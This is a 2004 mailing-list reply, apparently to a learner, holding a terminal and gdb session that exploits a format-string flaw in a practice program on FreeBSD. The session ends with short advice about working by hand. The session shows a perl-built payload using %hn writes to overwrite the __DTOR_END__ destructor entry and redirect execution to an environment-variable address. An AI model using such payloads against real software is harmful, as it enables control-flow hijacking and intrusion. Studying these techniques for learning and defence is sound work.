-bash-2.05b$ uname -msr
FreeBSD 5.2.1-RC2 i386
-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049848 d __DTOR_END__
-bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...(gdb)
(gdb) x/1s 0xbfbfedf5
0xbfbfedf5: "EGG=vlad902"
(gdb) b * 0xbfbfedf9
Breakpoint 1 at 0xbfbfedf9
(gdb) run `perl -e 'print
"\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" .
"%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'`
...
[*] test_val @ 0x0804979c = -72 0xffffffb8
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0xbfbfedf9 in ?? ()
> Can somebody give me some hints, advices and guides?
Only advice I can give you is do it by hand rather then having tools
do it for you. Although while exploiting it beware, I found the stack
is very quirky which is why I seem to have so many useless %x s'
lieing around
-vlad902
Received on Jul 31 2004
Intro
